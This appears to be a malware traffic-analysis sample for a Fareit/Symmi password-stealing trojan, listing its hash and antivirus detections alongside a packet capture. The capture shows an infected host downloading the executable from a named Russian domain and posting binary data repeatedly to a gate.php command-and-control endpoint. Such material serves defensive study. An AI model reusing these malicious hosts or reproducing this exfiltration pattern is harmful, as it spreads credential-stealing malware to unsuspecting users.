Fereit/Symmi Shit.exe Trojan Password Stealer Malware PCAP file download Traffic Analysis Sample

SHA256: 54c8ce7531f1b01dcda678c41fb14ffc5f223ff0427fc83de939d2286ad200f0
File name: shit.exe
Detection ratio: 39 / 56
Analysis date: 2016-10-31 02:32:28 UTC ( 0 minutes ago )
AVG Crypt6.HNN 20161031
AVware Trojan.Win32.Generic!BT 20161031
Ad-Aware Gen:Variant.Symmi.68665 20161031
AhnLab-V3 Trojan/Win32.Fareit.N2141190184 20161030
Antiy-AVL Trojan[PSW]/Win32.Fareit 20161031
Arcabit Trojan.Symmi.D10C39 20161031
Avast Win32:Malware-gen 20161031
Avira (no cloud) TR/Agent.egpwh 20161030
BitDefender Gen:Variant.Symmi.68665 20161031
CAT-QuickHeal (Suspicious) – DNAScan 20161029
ClamAV Win.Trojan.Generic-3223 20161031
CrowdStrike Falcon (ML) malicious_confidence_82% (W) 20161024
DrWeb Trojan.PWS.Stealer.1932 20161031
ESET-NOD32 a variant of Win32/Kryptik.FIKV 20161030
Emsisoft Gen:Variant.Symmi.68665 (B) 20161031
F-Secure Gen:Variant.Symmi.68665 20161031
Fortinet W32/Fareit.CEIG!tr.pws 20161031
GData Gen:Variant.Symmi.68665 20161031
Ikarus Trojan.Win32.Crypt 20161030
Invincea virtool.win32.obfuscator.xy 20161018

2016-10-30 22:38:24.577664 IP 192.168.1.102.61884 > 85.143.222.24.80: Flags [P.], seq 0:315, ack 1, win 256, length 315: HTTP: GET /~kingskil/Prince/Man/lucy/mine/shit.exe HTTP/1.1
E..c..@……..fU……P.j…XX.P…._..GET /~kingskil/Prince/Man/lucy/mine/shit.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: kingskillz.ru
Connection: Keep-Alive

2016-10-30 22:38:24.754088 IP 192.168.1.102.61884 > 85.143.222.24.80: Flags [.], ack 2908, win 256, length 0
E..(..@….4…fU……P.j…Xd1P…y………

E..(..@….(…fU……P:…../.P………….
2016-10-30 22:38:46.639495 IP 192.168.1.102.61887 > 85.143.222.24.80: Flags [P.], seq 0:294, ack 1, win 256, length 294: HTTP: POST /%7Ekingskil/Prince/Man/lucy/mine/gate.php HTTP/1.0
E..N..@……..fU……P:…../.P….s..POST /%7Ekingskil/Prince/Man/lucy/mine/gate.php HTTP/1.0
Host: kingskillz.ru
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 340
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)


E..(..@….”…fU……P….i…P…w=……..
2016-10-30 22:38:54.708909 IP 192.168.1.102.61888 > 85.143.222.24.80: Flags [P.], seq 0:294, ack 1, win 256, length 294: HTTP: POST /%7Ekingskil/Prince/Man/lucy/mine/gate.php HTTP/1.0
E..N..@……..fU……P….i…P…[…POST /%7Ekingskil/Prince/Man/lucy/mine/gate.php HTTP/1.0
Host: kingskillz.ru
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 340
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)


E..(..@……..fU……P..n;….P………….
2016-10-30 22:39:02.332735 IP 192.168.1.102.61889 > 85.143.222.24.80: Flags [P.], seq 0:294, ack 1, win 256, length 294: HTTP: POST /%7Ekingskil/Prince/Man/lucy/mine/gate.php HTTP/1.0
E..N..@……..fU……P..n;….P….s..POST /%7Ekingskil/Prince/Man/lucy/mine/gate.php HTTP/1.0
Host: kingskillz.ru
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 340
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)